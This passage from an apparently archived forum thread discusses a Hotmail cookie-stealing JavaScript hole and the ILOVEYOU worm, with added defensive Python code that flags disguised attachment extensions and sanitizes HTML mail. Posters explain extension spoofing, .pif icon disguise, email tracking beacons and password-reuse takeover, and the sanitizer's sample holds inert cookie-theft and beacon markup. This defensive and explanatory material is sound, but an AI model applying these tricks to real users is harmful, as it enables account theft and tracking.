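Added example, not code from the original posts. The extension sets are
constructed for illustration and are not exhaustive.
"""
import os
from dataclasses import dataclass

# Extensions Windows runs as code when double-clicked (constructed list).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".wsh", ".hta", ".lnk"}
# Extensions users are trained to regard as harmless data (constructed list).
BENIGN_LOOKING_EXTS = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".doc", ".pdf",
                       ".mp3", ".zip", ".htm", ".html"}
# Registered with NeverShowExt: Explorer hides these even with "hide known types" off.
ALWAYS_HIDDEN_EXTS = {".pif", ".lnk", ".url"}


@dataclass
class AttachmentVerdict:
    real_name: str
    shown_with_hiding: str      # what a default-configured Explorer displays
    shown_without_hiding: str   # what it displays with the hiding option turned off
    executable: bool
    deceptive: bool
    reason: str


def split_ext(name):
    base, ext = os.path.splitext(name)
    return base, ext.lower()


def displayed_name(name, hide_known):
    """Approximate Explorer's rendering of a file name."""
    base, ext = split_ext(name)
    if ext in ALWAYS_HIDDEN_EXTS:
        return base
    if hide_known and ext in EXECUTABLE_EXTS | BENIGN_LOOKING_EXTS:
        return base
    return name


def check_attachment(name):
    base, ext = split_ext(name)
    shown = displayed_name(name, hide_known=True)
    shown_nohide = displayed_name(name, hide_known=False)
    if ext not in EXECUTABLE_EXTS:
        return AttachmentVerdict(name, shown, shown_nohide, False, False, "data file")
    # What remains once the real (executable) extension is hidden.
    _, inner_ext = split_ext(base)
    if inner_ext in BENIGN_LOOKING_EXTS:
        return AttachmentVerdict(name, shown, shown_nohide, True, True,
                                 f"{ext} script disguised as {inner_ext}; shown as {shown}")
    if ext in ALWAYS_HIDDEN_EXTS:
        return AttachmentVerdict(name, shown, shown_nohide, True, True,
                                 f"{ext} is never displayed; shown as {shown}")
    return AttachmentVerdict(name, shown, shown_nohide, True, False, f"plain {ext} executable")


def find_deceptive(names):
    """Names from a batch that a user would likely misread as harmless."""
    return [v.real_name for v in map(check_attachment, names) if v.deceptive]


# Constructed sample names, echoing the patterns discussed in the thread.
SAMPLE_ATTACHMENTS = [
    "noodiepic.jpg.vbs",
    "lovenote.txt.vbs",
    "FIXFORTHELOVEBUGTXT.vbs",
    "vacation.jpg",
    "readme.pif",
    "setup.exe",
]

if __name__ == "__main__":
    for n in SAMPLE_ATTACHMENTS:
        v = check_attachment(n)
        print(f"{n:28} shown as {v.shown_with_hiding!r:20} deceptive={v.deceptive} ({v.reason})")
```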
Hey, leave comments about my mother out of this!
I saw something funny on CNBC during the ILOVEYOU worm outbreak. They were advising people not to save attachments to disk, as that could lead to infection, but to just execute the attachment. Not only was the mainstream media not educating people, they were actively making it worse.
The Economics of Website Security
I still use my Hotmail account...as a Spam Trap. I log in once every 6 months or so to delete everything. Works like a charm!
I just want to take over the world...Why does that automatically make me EVIL?
I still have my hotmail account, I use it as my "spam bucket". You know those free websites that offer free accounts (like the new york times), but you have to give them your email address? Also when you register with search engines, sign up FREE to win crap out there, just use a hotmail account and see how long it takes to fill completely full with spam (it took mine 3 days!)...
A neat treat though, just put a filter in to filter out anything with 'A' in the subject, they allow like 5-10 filters, so delete everything that has a vowel in the subject line!
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
After the machine is infected is where the hidden extension comes into play. Or if someone was mapped to your machine, and they became infected, and you had no clue (the biggest problem in our outbreak). Then, since you didn't open the emails, you disregard the warnings, and open up your (infected) jpg's. And boom, you spread it around again, now on your entire hard drive, and everything you're mapped to.
I wonder.... how many people will take the time to realize that it was a bunch of BSD hackers who implemented this hole, and not engineers at Microsoft?
I am very small, utmostly microscopic.
It is "executed by people with very" little computer experience who cannot even form one complete and coherent English sentence.
ByteMyCode.com: A Web 2.0 code sharing community.
I've had a hotmail account for about 3 years and I still use it.
:)
Every time I sign up for anything on the internet, anytime a webpage asks me for email, any time I have to put in an email address to 'register' a program, or any convention I sign up for, I put in my hotmail address... They then usually ask me a bunch of personal questions. I'm always 25-35 male, I make $100,000+/year and am single. And when you see all those little boxes where you check off your interests? Well, I check them all. Then I check (or uncheck) those boxes that ask me if I want their monthly, weekly, daily email magazine. Oh, and I want all the updates whenever they update their software/web page, etc...
I currently get 7-8 emails a day at that address.. about twice a week I get one from Hotmail Staff telling me my mailbox is full..
That is *absolutely* the case. That's why the ILOVEYOU virus author renamed files not from file.ext to file.vbs but to file.ext.vbs.
Moderate Chris Hiner's post UP.
I've used it for four years. The only two times I considered giving it up were when MS bought them (and immediately added nifty little features like defaulting to MSN, passports, and having to tab twice to enter username and password) and when I started getting spammed really bad by Email.com, AOL and Yahoo users. But then I realized that if I switched to any of the other big ones previously mentioned it would probably get worse.
YEA FOR YOU!
Are you self taught?
How many hours have you logged?
How long before you were really good?
I never checked what they run (don't really care as long as it works) but I use newmail.net - you can use their web-based access, or they have a POP server you can also use. They also have a SMTP server that you can use, too. I have been pretty happy with them. Much more than with Hotmail.
Moon Macrosystems. Sun's biggest competitor.
Well in actuality if you format your HD and haven't written anything else to it since format you can recover the files. When you format you're not overwriting the data just clearing the node entries. So a recovery is very possible.
ctrl+shift+S
Dude, good times was a hoax. Get wit the program.
spoo
yeah, true... but it was still a funny comment, darn it
Ummm, dumbass.... Macros can go into standard .doc files, not just .dot, so I think you might want to re-think your little program idea.
People with accounts on lots of services tend to recycle passwords, through laziness or ignorance. So if you can infer from someone's email what other services they use, you have a good chance of taking them over too.
I used to do frontline support at a University - you would be amazed at how many people use the same password for everything.
however even with the file extensions on, windows refuses to show the .pif extension, and its icon can be changed to whatever... I've thought this to be an interesting concept for a while, just waiting for someone to exploit it now...
Now everybody's equal, just don't measure it. -Bad Religion
Never used hotmail, but I've had some rather good experiences with yahoo's free mail service.
-- Dr. Eldarion --
It's not what it is, it's something else.
The proper extension for a Word file with macros is ".dot", because it's a template (a Word template is a dynamic object which produces documents, a Word document is a static object and can't contain code) - just because Word is too stupid to complain if you name it ".doc" doesn't change that. What you're saying is like insisting that a ".jpg" can hold formatted text, arbitrary JavaScript, and hyperlinks because if you rename an ".html" file to ".jpg" IE will still open it as HTML.
At any rate, my program detected macros in files with the extension ".doc". It wasn't a program idea, it was a working program that I tested and proved effective.
From http://www.emergency.com/wordvrus.htm:
An important point to make here is that Word documents (.DOC files) can not contain macros, only Word templates (.DOT files) can contain macros. However, it is a relatively simple task to mask a template as a document by changing the file name extension from .DOT to .DOC.
I hate pathetic morons who go around insulting people for imagined mistakes without checking their facts.
I bet in the UK you couldn't sue a restaurant (and win) because you spilled coffee on yourself.
-- Dr. Eldarion --
It's not what it is, it's something else.
I am using a module for the ROXEN web server called IMHO (Internet Mail HOst). Just started trying it. It works well to access IMAP mail boxes over a web interface.
The only disadvantage is that you have to be using Roxen since it is written in RXML, but some may not consider that a disadvantage.
BTW I am using it with FreeBSD, but it will work with Linux too.
Concerning this hotmail exploit, there is the same security risk on the Mac as with Wintendo. Key here is that you're not using Hotmail, but Microsoft's other e-mail product. With Lookout express on the Mac, you're safe from all the VBS ILOVEYOU-styled trojans.
Seth
$5 / month hosted VPS on linux = awesome!
This is not true ``by definition'' at all. Half the population is dumber than the average person only if the median of the dumbness distribution is equal to the mean.
At a certain large Canadian technology company, after having the email shut down by a Word macro virus panic, I once wrote a program that identifies attachments with a ".doc" extension that are actually ".dot" files (Word document templates that could contain macro viruses). If it was a real ".doc", it just opened the file with Word; if it was a ".dot", it put up a dialog box with big biohazard signs that said "This is a falsely labeled file! It could carry a virus or trojan horse! ARE YOU SURE YOU WANT TO OPEN IT?"
Everyone who saw it, including my boss, agreed that it solved the problem completely. However, nobody installed it, and nobody outside of my department was shown it. It was almost certainly deleted shortly after I left the company, and the vulnerability (to a few specific viruses) solved several months later by purchasing expensive anti-virus software.
Home users have an excuse: most of them are ignorant. They have a vague idea of some portion of what's on their hard drive and what's on the internet, and of the difference between an application and a document. Corporations, though, want a simple solution: money out, invulnerability to viruses in. The answers have been jumping up and biting them on the nose from any halfway decent MIS department, from security websites, from annoyed articles in the trade papers, but the managers involved want their computers to "just work", and not be bothered with having to think (or making all their employees apply common sense, which, I must admit, is about as difficult as teaching cats to march in formation).
Well, as if you can't guess... I dropped mine like a hot potato when MS bought out Hotmail... To understand recursion, you must first understand recursion...
"To hope's end I rode and to heart's breaking: Now for wrath, now for ruin and a red nightfall!"
My wife uses Hotmail, because she likes the convenience of getting her mail through a web browser, from any computer. I've seen a few apps for Linux that allow you to pull your mail off a POP or IMAP server, and access it through the web (ACME mail comes to mind - http://www.astray.com/acmemail/)
Has anyone used this, or similar programs? How well do they work? How insecure are they?
It'd be nice to set up an alternative web mail system....
---
Even if you tell a person not to execute programs attached to emails that person won't believe you (or likely won't know what you are talking about). They will execute it anyway. Further proof of incompetence comes when even after infecting themselves with something nasty, they open the attached FIXFORTHELOVEBUGTXT.vbs the next day.
Why should we restrict our email to plain text ?
HTML and RTF allow us to format email far more effectively than plain text ever will. Shouldn't we just make them more secure?
McC
Don't you mean "Only Hitler..."?
My boss does this. I spend at least half an hour a week backtracking through the spastic clicking he does when unexpected dialogue boxes appear. Incidentally, I work for Microsoft. No kidding.
(Also confusing the matter: I don't think you can score anywhere near 0 IQ without being dead.)
The cake is a pie
Oh, yes. I've actually suggested we do something similar at our company. We send out HTML emails to our customers. The URL in the IMG tag doesn't have to be an image at all--it can be a CGI page which redirects to an image. Throw a couple of parameters (like a user-id) into the URL, and the CGI page can record exactly when users open the email. Nifty, eh? I never thought of capturing the IP address directly (not something we're interested in) but it would obviously be possible.
Wonder if this could be exploited further?
Why would anyone in their right mind let unknown people run foreign code on their machines? Yes, I get executable attachments sometimes myself, but why would I want to run code that does who knows what? I guess I just know too much about the kind of people out there. Yeah, maybe that's it.
Just goes to show, once again, that there are two kinds of people in the computer world -- those who know what they're doing and understand the technology, and those who are along for the ride and depend completely on their "gurus" for anything even the slightest bit off the routine.
I have to rant a little about this because around here 9 times out of 10 people come to me to bail them out when they screw something up, and only one of my jobs pays me for that. I have very little trouble believing that quite a few people would answer "yes" to your question, and not much more trouble believing that they would come whining to more clueful people about getting their files back afterwards.
("No, you don't understand. You FORMATTED the hard drive. That ERASES the hard drive. Unless you backed up those files which were ON the hard drive, they're gone. Sorry
73 de N5VB (ex-KD5BIV) AR SK
So I just tried to send a message through hotmail, and I got a 404-ish error. So I logged back in to Hotmail and later got a message while refreshing saying that the server holding my account was temporarily unavailable. Sounds like they're taking the machines offline to throw in a patch.
I'm hella pissed, though, because the mail I was sending was to a headhunter I've been talking with about a sweet Linux job and I don't know if it went through or not.
It's enough to make a person switch over to PEmail. Old habits die hard, though. I've been using Hotmail since before M$ bought them.
-carl
. We've got computers, we're tapping phone lines, you know that ain't allowed - Talking Heads, "Life During Wartime"
I wrote a little "application" that was a simple little dialog box that asked the user if he wished to format the hard drive (in so many words) to see just how many of our in-house users really read those messages - and attached it to an email sent to everyone in the office (around 150 users). (Results were then sent to my computer through TCP connection, for those interested) 1 out of 3 users clicked yes..
Like the Dilbert comic where the boss becomes irate at a statistic that 40% of sick days are on Monday and Friday.
*gasp*!
Pablo Nevares, "the freshmaker".
Microsoft is announcing it as an undocumented feature, not a security hole...
kwsNI
"If you tell a man that there are millions of stars in the sky, he'll believe you. If you caution a man about wet paint, he'll have to touch it before he'll believe you."
You can remind people ad nauseum that you shouldn't execute programs attached to e-mails because they might contain viruses. Most won't remember or believe you until they experience a virus infection for themselves.
--
If a tree fell on a florist, and nobody was around to hear it, would he make a noise?
Sean Shannon
Proprietor and Editor-in-chief,
the next step is a worm that affects web discussion forums. i wouldn't be at all surprised if slashdot was its main target, just because of slashdot's size and the fact that javascript's security model is messed up on all browsers.
--
The shareholder is always right.
yes. I too was surprised that the poster apparently had failed to read the article.
Now that has to be the height of laziness
Alan Cooper in About Face characterizes the message box as "arguably the most abused part of the graphic user interface." As he states later in the book, confirmation messages "only work when they are unexpected." The answer isn't to make the users do even more work to get past these useless messages, but for programmers to stop forcing the users to click through endless dialog boxes to perform the simplest tasks.
I'm not an actor, but I play one on tv.
From the page, this seems to be an unfriendly JavaScript exploit, not Visual Basic Script, and pretty different from ILOVEYOU.
Scientia est Potentia.
It doesn't actually do many of the horrible things associated with the ILOVEYOU crap, but it will let someone else commandeer your hotmail account.
A quick summary: javascript in a rogue cookie on a hostile site tells Hotmail to send its own cookies to someone else. Once that person has those cookies, he has all the authentication he needs to use/abuse the original person's Hotmail account.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
I can tell that a good many of you have had the experience of explaining how, say, a hard drive works and seeing your co-worker's (or parents, great aunt, 3rd grade teacher, manager, etc.) eyes glaze over and their heads nod listlessly. To tell the truth, most people I have run into are scared of doing something wrong. Won't even open one up to put in a stick of RAM. "It's for the professionals to do" they say (and then they gladly pay someone at the local office supply store to do it for some ungodly sum.)
I think it is the job of the techies to be proactive and protect those "lusers" as much as possible. Go ahead, slam MS as much as you want, but if you're expecting for that lawyer or doctor or insurance adjuster whose computer you just worked on to be cognizant of the dangers of clicking on an attachment, don't hold your breath.
After all, how many of you know enough about your car to dispute your mechanic's diagnosis of that funny sound you hear when you put on the brakes? It's for the professionals to do, correct?
This is another view of the world.
good point.
--
The shareholder is always right.
I'm surprised it was that low. There are A LOT of stupid people out there.
By turning on their SPAM protection and having it go directly into my trash, I have received probably one piece of spam in the past month, and I have everything going into this account, I use it for posts on usenet, and regular mail still goes through... it's very very nice... They really have cleaned up their act...
Free music from Jack Merlot.
including both median and mean. Anyway, because intelligence isn't really something you can put a real number to, we're free to fake a nice balanced bell curve where the median and the mean are the same. I think it works out that way with I.Q.
You're right of course (and I realized my mistake moments after submitting). s/in cookie/on website/i.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Actually, as other posters have already told you, half of the population is dumber than the median, not the average.
The interesting thing is that MORE than half is dumber than the average Joe: the lower tail of the distribution "saturates" on 0 IQ, while there is no limit on higher than average IQs.
Put it another way, with very few exceptions, no one can be dumber than mud (IQ 0) while there will be few(?) more than twice as smart as our beloved Joe!
And by looking at what CmdrTaco wrote up there, he's been hitting the bottle early this morning.
Could this also affect Yahoo or other web-mail services? Or just Hotmail because of the specific kind of info they keep in their cookies?
Users have become so numb to the pop-up dialog "Click Yes/OK to continue" that they are no longer a fully effective tool in GUI design. Time to think up something that will not provoke a knee-jerk reaction every time it pops up. I admit it, when I'm in a hurry, I click "OK" as soon as I see it, too.
How many non-geeks do you think are aware of this choice at all, let alone what it means?
From the way this story is worded, I'm led to believe that you could construct a similar javascript to get the cookies from any website.
Just one more reason that I only use crashscape (Which is what I've been calling that program since 1.1 when I first saw it) with sites I trust. Mostly my bank because they require javascript for some reasons (at least to log in, once I'm logged in I've disabled it with no problems, but that is a pain)
What a lot of us forget, is that Windows 95 defaults to not showing the extension for files it knows the type of. So if you name a file NIFTY_PICTURE.GIF.VBS, a lot of non technical people will see it as NIFTY_PICTURE.GIF. But when they double click it, it runs...
(Win98 may default to this too, I don't remember)
I suspect lots of nongeeks leave it at the default...
Use the Preview Button! Don't forget to Preview before posting!! Thanks!!!
The luser types away, giving its username and easily guessable password...
Luser: "Oh, look -- my fiancée sent me an email. How do I know? It's entitled, 'ILOVEYOU'. I guess she doesn't use spaces. btw, what's with this .VBS file?"
Another luser gets flooded with 50 or so of these email from all of the luser's friends and family.
Luser: "Wow -- advertising! I should look at one of these! Oh, what's this? Two files, one with the extension .EXE, and the other with the extension .VBS! WOW!"
Talk about ".DUM"...geez, will lusers ever learn?
Karma whorin' since 1999
ok, who does this, huh?
the same people who click 20 times to open an email cause they have so much sh!t open. Then they wonder why they have so many copies of it open...they don't know how many times to click when they are told to "double-click".
"Leave the gun, take the canoli."
this is just a placeholder till i send back my real sig from the future.
Hmm..speaking of stupid. You forgot to tell me what i mean. Also, i was not aware that the *nix dict command was the be all end all when it comes to english words. Ain't wasn't in the dictionary for a long time either, but that didn't stop people from using it.
I'm sure that pretty much everyone here has or has had a Hotmail account at some point in the past. Quick poll: How long did you use Hotmail, and why did you finally give it up?
Got Rhinos?
People are lazy and don't consider the ramifications of what they do. This puts more burden on programmers to protect idiots from themselves.
There are many alternatives to Outlook Express (in the case of the love bug) or Hotmail, but people that are too lazy to properly evaluate the suitability and safety of their tools will get hurt. This happens with physical tools.
That Taiwanese-brand hammer is way more likely to split and send shards into your eye, but is that your fault or the manufacturer's fault? In the US, it is of course entirely the manufacturer's. In the UK, well, the judge would make an arbitrary partition and say it was maybe 60% the manufacturer's fault, and 40% mine. Of course the UK approach is much less sane.
Thanks for the tip. I have now created just such a folder. It never ceases to amaze me who opens these things and ends up hosing-up my entire day cleaning up the mess. And then once they know they are busted they don't want you to tell anyone they opened it. more advice for dealing with dip$hit coworkers? We all have a lot of 'em.
I need to moderate this up. No wait, it has to be a lie, 33% of human kind _can't_ be that stupid. :/
--
"Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
How's "resetting the filesystem" for a name?
Will I retire or break 10K?
I normally use Hotmail through Outlook Express (no flames please; my filename extensions are not hidden). When I get a spammer, I just report her.
Will I retire or break 10K?
No that's for 2nd posters
There is an analog in meatspace warning labels. Due to lawsuits, warning labels on all sorts of products have become small books. The few useful messages are lost in the clutter. Have you read all the warnings on your step ladder? No, you just used it. The one or two sensible warnings were lost in a blizzard of BS about pregnant women not operating heavy machinery.
Conditioned like a rat.
The people who open these are the same people who ran the Elf Bowling game a few months ago.
How do you know that the game came from Nordstrom's (I believe that was the company) when the damn thing isn't even signed with a legitimate certificate. It is attachments like these that ease people's minds into thinking that only good can come from opening foreign attachments.
The next time I see garbage like this without a legit certificate I'm giving them a piece of my mind.
Agreement. Of course, I wouldn't be surprised if the sandbox implementation in the Visual J++ "Virtual Machine" has a bunch of holes in it. Just seems par for the course...
Blar.
(ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).
If I read the attack information right, the user would see an HTML file.. to many, just another web site. Now, even if it wasn't such, who would press on and get zapped?
Likely the click-happy, who don't see an odd extension as one or such, but just click reflexively, as they've always done. One more reason I loathe attachments. (I was getting emails at work that were just attachments, no explanation, not even a subject. Someone got offended when I replied "Deleted: Unread, not important enough for sender to identify, not important enough to read.")
Microsoft/HotMail? Yes, left a door unlocked. They really should lock it properly. But an unlocked door doesn't get opened by itself.
Some crackerd00d wannabe? Yes, that person opens the door, or at least puts up the sign on it suggesting that it be opened. But even this person hasn't done the real damage.
The first two set up conditions for the rest. The ones who don't see what they look at and just click, just like always, not pausing to inspect.
There was(is) a hole, and someone has exploited it... but, in the recent "LoveBug" case, there were a surprising number of accomplices all over the globe.
I don't subscribe to RMS's GNUtopian vision.
Most people wouldn't think twice about opening a snail mail package addressed to them, even if it has no return address on it, and seems somewhat heavy. That's why the unabomber managed to rack up a pretty decent string before being caught. People don't tend to think that bad things will happen to them when they are using tools that they deal with everyday without understanding.
To put it another way, while most people think of themselves as fairly decent drivers, how often in the past week have you been cut off, or had the guy in front of you make a turn without signalling? People get so used to using tools that they become careless; this is compounded if the person doesn't understand how the tool that they are using works, or at least had it drilled into their heads the way to safely use the tool.
It's just a matter of time before people get more careful about opening things they're not sure are safe. I imagine Thag got a lot more careful with fire after watching Thog torch himself.
"This is your world. These are your people. You can live for yourself today, or help build tomorrow for everyone."
I hate HTML formatted messages. Basic tags are ok (like bold, italic), but I really don't like colors. I often get emails with black text on a dark background, or yellow text on a white background. Plain text is easier for me to read, and uses less bandwidth.
Slightly off-topic -- non-hotmail point, about OE:
;-P
I'm running OE on the Mac laptop, only because of one key feature it has, and just switched back to it from Mailsmith, actually.
The feature was the ability of it to automatically detect what proxy settings to use with my home Wingate machine without having to adjust anything in OE itself. I haven't seen another program be able to do that. I just tell the Mac about my Proxy IP, OE (and IE, for that matter) sense the configuration change in the Apple system files and adjust appropriately. No manual, or otherwise, adjustments needed in my browser or mail client!
But, now I'm a little concerned about OE, even though it doesn't speak VBscript on the Mac, because other malicious content can be sent to it. I'd say it's running 60/40 on the PC only vs. Mac,too OE bug effectiveness meter. Don't quote me on that...
Has anyone seen a Mac mail client that is that versatile, eh? I think not. But OE also scares me, none-the-less. I'd use Linux, but our foreign language translation business really demands the use of a Mac, believe it or not.
Comments and thoughts, and suggestions of other mail clients are welcome and invited...
-- I lived through the IPO Rush of '99
Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is actually an HTML file which contains the exploit. More specifically:
The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.
Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
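As an added example (not Hotmail's, Peacefire's, or any poster's code), a filter of the kind this post says Hotmail applied to message bodies but not to HTML attachments: it drops script elements, event-handler attributes and javascript: URLs before the HTML is shown, and it also neutralizes the remote-image read-receipt trick described in the earlier post about IMG tags pointing at a CGI. The tag and attribute lists and the sample attachment are constructed assumptions, not a real exploit file.

```python
"""Sanitize an HTML mail body or HTML attachment before it is displayed.

Added example, not Hotmail's or Peacefire's code. It models the two risks
discussed in this thread: embedded script that can read and forward the
viewer's session cookies, and remote <img> references that act as read
receipts. The tag/attribute lists are constructed and not complete.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements dropped together with everything inside them.
DROP_CONTAINER = {"script", "style", "iframe", "object", "applet", "frame", "frameset"}
# Void elements dropped outright (no content to skip over).
DROP_VOID = {"meta", "link", "base", "embed"}
# Attributes whose value is a URL and therefore a script-injection vector.
URL_ATTRS = {"href", "src", "action", "background", "lowsrc", "dynsrc", "formaction"}
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}


def url_scheme(value):
    """Scheme of an attribute value, ignoring whitespace/control-character padding."""
    compact = "".join(ch for ch in value if not ch.isspace() and ord(ch) >= 32)
    return urlsplit(compact).scheme.lower()


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.report = []
        self._skip = 0  # nesting depth inside a dropped container

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.report.append(f"dropped handler {lname} on <{tag}>")
                continue
            if lname in URL_ATTRS and value is not None:
                scheme = url_scheme(value)
                if scheme in SCRIPT_SCHEMES:
                    self.report.append(f"dropped {scheme}: URL in <{tag} {lname}>")
                    continue
                if tag == "img" and lname == "src" and scheme in ("http", "https"):
                    # Fetching this would tell the sender when, and from where, the mail was read.
                    kind = "beacon (has query parameters)" if "?" in value else "remote image"
                    self.report.append(f"blocked {kind}: {value}")
                    continue
            kept.append((lname, value))
        return kept

    def handle_starttag(self, tag, attrs):
        if self._skip:
            if tag in DROP_CONTAINER:
                self._skip += 1
            return
        if tag in DROP_CONTAINER:
            self._skip += 1
            self.report.append(f"dropped <{tag}> and its contents")
            return
        if tag in DROP_VOID:
            self.report.append(f"dropped <{tag}>")
            return
        parts = [tag]
        for name, value in self._clean_attrs(tag, attrs):
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if self._skip:
            if tag in DROP_CONTAINER:
                self._skip -= 1
            return
        if tag in DROP_VOID:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # conditional comments can smuggle markup past filters; drop them all

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def sanitize(html):
    """Return (cleaned_html, report) for an HTML body or attachment."""
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.report


# Constructed sample modelled on the thread's description: script that would
# forward the session cookie, plus a 1x1 tracking image with a user id.
SAMPLE_ATTACHMENT = """<html><body onload="steal()">
<script>/* would forward document.cookie off-site here */</script>
<b>Hi!</b> <a href="JaVaScRiPt:void(0)">click</a>
<img src="http://tracker.invalid/open.cgi?uid=1234" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    cleaned, findings = sanitize(SAMPLE_ATTACHMENT)
    print(cleaned)
    print("\n".join(findings))
```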
And don't forget it did have a txt in there. And if you save it to the desktop first, it looks like a text file. windows by default hides the file extension, which in this case is vbs, so you are left with just .txt. And have you seen the vbs icon? It looks like a scroll.
Lastly, if you get something in your real mail that you look at and say wtf? wouldn't you open it? (yeah, yeah, yeah, not if it looked like a bomb, right?)
And I'm kind of surprised there aren't more trojaned joke email programs. Those things get sent around like no tomorrow if they're funny enough (and some, uh, less so)... remember elf bowling? the combo#5 flash program? that fucking cat that walks around on the desktop... In other words, people are just plain used to viewing and running attachments in most settings.
This one can't be blamed on VBS -- JavaScript was used for this exploit. Since Hotmail requires JavaScript, this means that all users -- not just those with Windows -- could have been victimized by this exploit.
This one could impact other web-email sites.
ObBias: Email shouldn't be in HTML, let alone have embedded scripts...strip it all folks!
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
Unfortunately everyone at my work. Which leads me to believe that virii will always be a problem. We all know that windows is really bad for security, but I don't think your average human can handle multiuser OS's. The few people here that have switched to win2000 always insist that they have administrative rights to their computer and I don't blame them. The only unix platform I think most of these people can handle is BeOS which in essence is a single user OS. I think we are doomed to dealing with these virii for as long as we have personal computers as we know them.